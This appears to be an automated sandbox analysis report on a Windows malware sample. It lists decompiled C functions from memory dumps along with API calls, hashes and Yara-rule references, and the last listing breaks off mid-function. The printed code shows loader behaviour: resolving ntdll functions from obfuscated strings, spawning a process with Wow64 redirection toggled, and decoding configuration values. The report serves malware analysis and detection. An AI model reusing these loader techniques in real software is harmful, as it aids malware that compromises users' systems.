Opcode Fuzzy Hash: 857f3f2e5c1fb3e97b82c0fb2fb7555369422281dcf0b5be781c8162136dce4e
Instruction Fuzzy Hash: AD218575A06BD0EFDF105F2DDC446A93BB0EB46B65B12412DE82493EB0EB395844CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0477762C, Relevance: 13.6, APIs: 9, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0477762C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x477a38c; // 0x50e9cd0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04775F43(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x47791cc;
				}
				_t46 = E047743FD(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04775C4E(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x477a2d0; // 0x96d5a8
						_t16 = _t75 + 0x477bad8; // 0x530025
						 *0x477a13c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04775F43(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x47791d0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04775C4E(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04772A03(_v20);
						} else {
							_t66 =  *0x477a2d0; // 0x96d5a8
							_t31 = _t66 + 0x477bbf8; // 0x73006d
							 *0x477a13c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04772A03(_v12);
				}
				return _v24;
			}

0x04777634
0x0477763a
0x04777641
0x04777647
0x0477764b
0x0477764f
0x04777652
0x04777659
0x0477765c
0x0477765e
0x0477765e
0x04777667
0x0477766e
0x04777671
0x04777677
0x04777681
0x0477768a
0x04777691
0x047776aa
0x047776b1
0x047776b4
0x047776bd
0x047776c6
0x047776d7
0x047776e0
0x047776e4
0x047776e8
0x047776ef
0x047776f2
0x047776f4
0x047776f4
0x047776fe
0x04777707
0x0477770e
0x04777726
0x0477772a
0x04777767
0x0477772c
0x0477772f
0x04777737
0x04777748
0x04777754
0x0477775c
0x04777760
0x04777760
0x0477772a
0x0477776f
0x04777774
0x0477777b

APIs

GetTickCount.KERNEL32 ref: 04777641
lstrlen.KERNEL32(?,80000002,00000005), ref: 04777681
lstrlen.KERNEL32(00000000), ref: 0477768A
lstrlen.KERNEL32(00000000), ref: 04777691
lstrlenW.KERNEL32(80000002), ref: 0477769E
lstrlen.KERNEL32(?,00000004), ref: 047776FE
lstrlen.KERNEL32(?), ref: 04777707
lstrlen.KERNEL32(?), ref: 0477770E
lstrlenW.KERNEL32(?), ref: 04777715

Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: b48f3383ba591cdc15785dc0f1aa99bc32cff1a5222c823ced1b17e191f5c9e3
Instruction ID: 0f366ccff031d401ab19fccbcd0c865a4c9974a15c7ca83d97fc2be63b5ee747
Opcode Fuzzy Hash: b48f3383ba591cdc15785dc0f1aa99bc32cff1a5222c823ced1b17e191f5c9e3
Instruction Fuzzy Hash: FE412972900219FBDF11AFA4CD48EDEBBB5EF44348F458094ED04A7321D735AA25EB90

Uniqueness

Uniqueness Score: -1.00%

Function 04777836, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E04777836(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E047771A3(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E04777973( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
				if(_t43 == 0 && ( *0x477a2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0x477a2d0; // 0x96d5a8
					_t18 = _t50 + 0x477b55b; // 0x73797325
					_t52 = E04771000(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0x477a2d0; // 0x96d5a8
						_t20 = _t53 + 0x477b73d; // 0x50e8ce5
						_t21 = _t53 + 0x477b0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x477a290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E04772A03(_t76);
				goto L12;
			}

0x0477783f
0x0477783f
0x0477784d
0x04777856
0x04777859
0x0477796b
0x04777972
0x04777972
0x04777868
0x04777870
0x04777875
0x04777878
0x0477788d
0x04777893
0x04777894
0x04777897
0x0477789d
0x047778a0
0x047778a5
0x047778ad
0x047778b4
0x047778bb
0x047778be
0x04777952
0x047778c4
0x047778c4
0x047778c9
0x047778d0
0x047778e4
0x047778e8
0x04777939
0x047778ea
0x047778ea
0x047778f1
0x047778f8
0x04777910
0x04777916
0x0477791a
0x04777934
0x0477791c
0x04777925
0x0477792a
0x0477792a
0x0477791a
0x0477794a
0x0477794a
0x047778be
0x04777959
0x04777962
0x04777966
0x00000000

APIs

Part of subcall function 047771A3: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,04777852,?,?,?,?,00000000,00000000), ref: 047771C8
Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047771EA
Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04777200
Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04777216
Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 0477722C
Part of subcall function 047771A3: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04777242

memset.NTDLL ref: 047778A0

Part of subcall function 04771000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,04774F1C,73797325), ref: 04771011
Part of subcall function 04771000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 0477102B

GetModuleHandleA.KERNEL32(4E52454B,050E8CE5,73797325), ref: 047778D7
GetProcAddress.KERNEL32(00000000), ref: 047778DE
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 047778F8
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 04777916
CloseHandle.KERNEL32(00000000), ref: 04777925
CloseHandle.KERNEL32(?), ref: 0477792A
GetLastError.KERNEL32 ref: 0477792E
HeapFree.KERNEL32(00000000,?), ref: 0477794A

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: 969c599b370befbeafc58135abc3b6477fd4aa4665312db218ddbf83c057fe89
Instruction ID: 54fb45e17c9e65b107bf81e63206057a9187517c3070d8d754f36b4c65cf730a
Opcode Fuzzy Hash: 969c599b370befbeafc58135abc3b6477fd4aa4665312db218ddbf83c057fe89
Instruction Fuzzy Hash: A53159B1A02219ABEF11AFA4D848EDEBFB8FF08354F908451E605A3211D774BA04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6C540B90, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6C540BC4
__CxxThrowException@8.LIBCMT ref: 6C540BF0
__CxxThrowException@8.LIBCMT ref: 6C540C18
__CxxThrowException@8.LIBCMT ref: 6C540C40

Strings

ios_base::badbit set, xrefs: 6C540BC9
ios_base::failbit set, xrefs: 6C540BF5
ios_base::eofbit set, xrefs: 6C540C1D

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 429c4468475db921b00b9096753fc794fb5a428e664bc60f92caa244a2985ded
Instruction ID: b71d36da2941e9db466c079a93c16259e1c608bbb9f565c9389e2f4587984876
Opcode Fuzzy Hash: 429c4468475db921b00b9096753fc794fb5a428e664bc60f92caa244a2985ded
Instruction Fuzzy Hash: 120196B1449340FAD310FA21CC1AF8E77E5DB94708F50CC0AB18866E83EB749D08CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6C542962, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C542969
std::_Lockit::_Lockit.LIBCPMT ref: 6C542973

Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011

Part of subcall function 6C53EB90: std::_Lockit::_Lockit.LIBCPMT ref: 6C53EB9F

codecvt.LIBCPMT ref: 6C5429AD
std::bad_exception::bad_exception.LIBCMT ref: 6C5429C1
__CxxThrowException@8.LIBCMT ref: 6C5429CF
std::_Facet_Register.LIBCPMT ref: 6C5429E5

Strings

bad cast, xrefs: 6C5429B9

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 1512642153-3145022300
Opcode ID: 4befa1e2826299c597247581e6089d527d3f9c715ad8a4e9d6d65647c3228bfe
Instruction ID: f66e3b0509322ebd4d2618b74728fa0dd5c9f94d04fedd6c86a06cde9ad1e8ef
Opcode Fuzzy Hash: 4befa1e2826299c597247581e6089d527d3f9c715ad8a4e9d6d65647c3228bfe
Instruction Fuzzy Hash: 38016D76900128DBCF05DBA4CC58AEE73B4BF84729F158519E415EBAD0EF349D48C791

Uniqueness

Uniqueness Score: -1.00%

Function 6C53FC20, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 137COMMON

Download Yara Rule

APIs

_localeconv.LIBCMT ref: 6C53FC53
__Getcvt.LIBCPMT ref: 6C53FC61

Part of subcall function 6C542252: ____lc_codepage_func.LIBCMT ref: 6C542269
Part of subcall function 6C542252: ____mb_cur_max_func.LIBCMT ref: 6C542272
Part of subcall function 6C542252: ____lc_locale_name_func.LIBCMT ref: 6C54227A

__Getcvt.LIBCPMT ref: 6C53FCBC

Strings

,, xrefs: 6C53FD6D
false, xrefs: 6C53FD05
true, xrefs: 6C53FD1B

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: Getcvt$____lc_codepage_func____lc_locale_name_func____mb_cur_max_func_localeconv
String ID: ,$false$true
API String ID: 3073657462-760133229
Opcode ID: d8f6ee8eca85715ad7a08ad78b90aa49e1d69ea61e62b7b83323c7bc6fdcdedf
Instruction ID: 8834043d077a69b7c08770166c50ea18451bfac1bdd7d68add71ef2f92f6b3e9
Opcode Fuzzy Hash: d8f6ee8eca85715ad7a08ad78b90aa49e1d69ea61e62b7b83323c7bc6fdcdedf
Instruction Fuzzy Hash: B25180B1C04258DADB11CF94CC44BEEBBB8FF84304F14425AD855AB741E735AA49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C5461AE, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 6C54C407: __getptd_noexit.LIBCMT ref: 6C54C408
Part of subcall function 6C54C407: __amsg_exit.LIBCMT ref: 6C54C415

RtlEncodePointer.NTDLL(00000000), ref: 6C5461D8
_CallSETranslator.LIBCMT ref: 6C54620E
_GetRangeOfTrysToCheck.LIBCMT ref: 6C546238

Strings

MOC, xrefs: 6C5461ED
=b, xrefs: 6C5461C5
RCC, xrefs: 6C5461F5

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: CallCheckEncodePointerRangeTranslatorTrys__amsg_exit__getptd_noexit
String ID: MOC$RCC$=b
API String ID: 3119380580-92667700
Opcode ID: 31fcebf25edf5e1b293eea4ad50211a7bb706fd41ef7e882c172172c3ff5cddb
Instruction ID: e0a020fb7f47155d08f004e49641e3f213ad8650c6e9a86ae8644b9b8bf4d127
Opcode Fuzzy Hash: 31fcebf25edf5e1b293eea4ad50211a7bb706fd41ef7e882c172172c3ff5cddb
Instruction Fuzzy Hash: 21416732504209EFDB11CF84CC80FEEB7B6EF84318F298259E914A7651DB35AD61DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6C53E010, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C53E03D

Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011

std::_Lockit::_Lockit.LIBCPMT ref: 6C53E063
std::bad_exception::bad_exception.LIBCMT ref: 6C53E0E7
__CxxThrowException@8.LIBCMT ref: 6C53E0F6
std::_Facet_Register.LIBCPMT ref: 6C53E10D

Strings

bad cast, xrefs: 6C53E0DE

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 153433846-3145022300
Opcode ID: a1c577e7a7fe06a0d8f3e36c08da0fc5a40986e460d3028bc25f038202eebf3a
Instruction ID: 24a92fc28ffa20d1ed09a0231849950d761a9d1c9887f73e1b4ecd0fbfc30e3c
Opcode Fuzzy Hash: a1c577e7a7fe06a0d8f3e36c08da0fc5a40986e460d3028bc25f038202eebf3a
Instruction Fuzzy Hash: AE31C532508220CFCB10CF24CC90B5AB7F5EB89728F054A19E85997B91E775ED05CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6C53DEE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C53DF0D

Part of subcall function 6C542000: __lock.LIBCMT ref: 6C542011

std::_Lockit::_Lockit.LIBCPMT ref: 6C53DF33
std::bad_exception::bad_exception.LIBCMT ref: 6C53DFB7
__CxxThrowException@8.LIBCMT ref: 6C53DFC6
std::_Facet_Register.LIBCPMT ref: 6C53DFDD

Strings

bad cast, xrefs: 6C53DFAE

Memory Dump Source

Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_RegisterThrow__lockstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 153433846-3145022300
Opcode ID: 6e511c3f4308784bb198772bdeab7a2bfec85ee58d8fe09a2b453b4d99a871b2
Instruction ID: 6b89a0006f1cd8ad394a4d0d3db7ddc34f10d4aa20033ce2df97baf30461c1f4
Opcode Fuzzy Hash: 6e511c3f4308784bb198772bdeab7a2bfec85ee58d8fe09a2b453b4d99a871b2
Instruction Fuzzy Hash: 0A31C371518220DFCB11CF28CC84B5AB7F5EB8A728F154619E85997B91E730ED09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0477374B, Relevance: 9.2, APIs: 6, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0477374B(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0x477a2cc; // 0x63699bc3
				if(E04773D6B( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x110) {
					 *0x477a320 = _v12;
				}
				_t25 =  *0x477a2cc; // 0x63699bc3
				if(E04773D6B( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0x477a2cc; // 0x63699bc3
						_t31 = E0477257B(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x477a298 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0x477a2cc; // 0x63699bc3
						_t32 = E0477257B(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x477a29c = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0x477a2cc; // 0x63699bc3
						_t33 = E0477257B(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x477a2a0 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0x477a2cc; // 0x63699bc3
						_t34 = E0477257B(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x477a004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0x477a2cc; // 0x63699bc3
						_t35 = E0477257B(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x477a02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0x477a2cc; // 0x63699bc3
						_t36 = E0477257B(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E04775A4E(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E0477461D();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0x477a2cc; // 0x63699bc3
						_t37 = E0477257B(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E04775A4E(0, _t37) != 0) {
						_t90 =  *0x477a37c; // 0x50e9630
						E04776027(_t90 + 4, _t42);
					}
					_t38 =  *0x477a2d0; // 0x96d5a8
					_t18 = _t38 + 0x477b2d2; // 0x50e887a
					_t19 = _t38 + 0x477b7c4; // 0x6976612e
					 *0x477a31c = _t18;
					 *0x477a390 = _t19;
					HeapFree( *0x477a290, 0, _t74);
					L48:
					return 0;
				}
			}

0x0477374b
0x0477374e
0x0477376e
0x0477377c
0x0477377c
0x04773781
0x0477379b
0x0477393e
0x04773940
0x00000000
0x047737a1
0x047737a1
0x047737a8
0x047737be
0x047737aa
0x047737aa
0x047737b7
0x047737b7
0x047737c8
0x047737ca
0x047737d4
0x047737d9
0x047737d9
0x047737d4
0x047737e0
0x047737f6
0x047737e2
0x047737e2
0x047737ef
0x047737ef
0x047737fa
0x047737fc
0x04773806
0x0477380b
0x0477380b
0x04773806
0x04773812
0x04773828
0x04773814
0x04773814
0x04773821
0x04773821
0x0477382c
0x0477382e
0x04773838
0x0477383d
0x0477383d
0x04773838
0x04773844
0x0477385a
0x04773846
0x04773846
0x04773853
0x04773853
0x0477385e
0x04773860
0x0477386a
0x0477386f
0x0477386f
0x0477386a
0x04773876
0x0477388c
0x04773878
0x04773878
0x04773885
0x04773885
0x04773890
0x04773892
0x0477389c
0x047738a1
0x047738a1
0x0477389c
0x047738a8
0x047738be
0x047738aa
0x047738aa
0x047738b7
0x047738b7
0x047738c2
0x047738c4
0x047738c7
0x047738c8
0x047738cf
0x047738d1
0x047738d2
0x047738d2
0x047738cf
0x047738d9
0x047738ef
0x047738db
0x047738db
0x047738e8
0x047738e8
0x047738f3
0x04773901
0x0477390b
0x0477390b
0x04773910
0x04773916
0x04773923
0x04773929
0x0477392f
0x04773934
0x04773941
0x04773945
0x04773945

APIs

StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 047737D0
StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773802
StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773834
StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773866
StrToIntExA.SHLWAPI(00000000,00000000,04772F44,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773898
HeapFree.KERNEL32(00000000,?,?,04772F44,63699BC3,?,04772F44,63699BC3,E8FA7DD7,0477A00C,745EC740,?,?,04772F44), ref: 04773934

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0187e225ab362a49bc1e9aee4b34841b41e9628fda873762e569e116691fc70e
Instruction ID: a33b23eedf6064df88989c673f88ab900ab3045daa34eeacd66d1c400af265e5
Opcode Fuzzy Hash: 0187e225ab362a49bc1e9aee4b34841b41e9628fda873762e569e116691fc70e
Instruction Fuzzy Hash: 85513671B10205ABEF11EBB9DDC8C9F77ADDB487407E48965A901D7305E639FA00EB60

Uniqueness

Uniqueness Score: -1.00%

Function 04772BF3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 04772C4F
SysAllocString.OLEAUT32(0070006F), ref: 04772C63
SysAllocString.OLEAUT32(00000000), ref: 04772C75
SysFreeString.OLEAUT32(00000000), ref: 04772CD9
SysFreeString.OLEAUT32(00000000), ref: 04772CE8
SysFreeString.OLEAUT32(00000000), ref: 04772CF3

Memory Dump Source

Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 9084393980c18ef63c035ad51062b3a79415f0efe85340a0d7a79b501fc81f4e
Instruction ID: 58b5ccde2557cb09e13044357807a7e26f26540937d564e8f7fe55f3bf061fea
Opcode Fuzzy Hash: 9084393980c18ef63c035ad51062b3a79415f0efe85340a0d7a79b501fc81f4e
Instruction Fuzzy Hash: 62316076D00609ABDF01DFA8C948ADFBBBAEF48300F544465ED10EB211DB75AE09CB91

Uniqueness

Uniqueness Score: -1.00%

Function 047771A3, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047771A3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04775C4E(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x477a2d0; // 0x96d5a8
					_t1 = _t23 + 0x477b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x477a2d0; // 0x96d5a8
					_t2 = _t26 + 0x477b787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04772A03(_t54);
					} else {
						_t30 =  *0x477a2d0; // 0x96d5a8
						_t5 = _t30 + 0x477b774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x477a2d0; // 0x96d5a8
							_t7 = _t33 + 0x477b797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x477a2d0; // 0x96d5a8
								_t9 = _t36 + 0x477b756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x477a2d0; // 0x96d5a8
									_t11 = _t39 + 0x477b7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E0477225C(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x047771b2
0x047771b6
0x04777278
0x047771bc
0x047771bc
0x047771c1
0x047771d4
0x047771d6
0x047771db
0x047771e3
0x047771ea
0x047771ee
0x047771f1
0x04777270
0x04777271
0x047771f3
0x047771f3
0x047771f8
0x04777200
0x04777204
0x04777207
0x00000000
0x04777209
0x04777209
0x0477720e
0x04777216
0x0477721a
0x0477721d
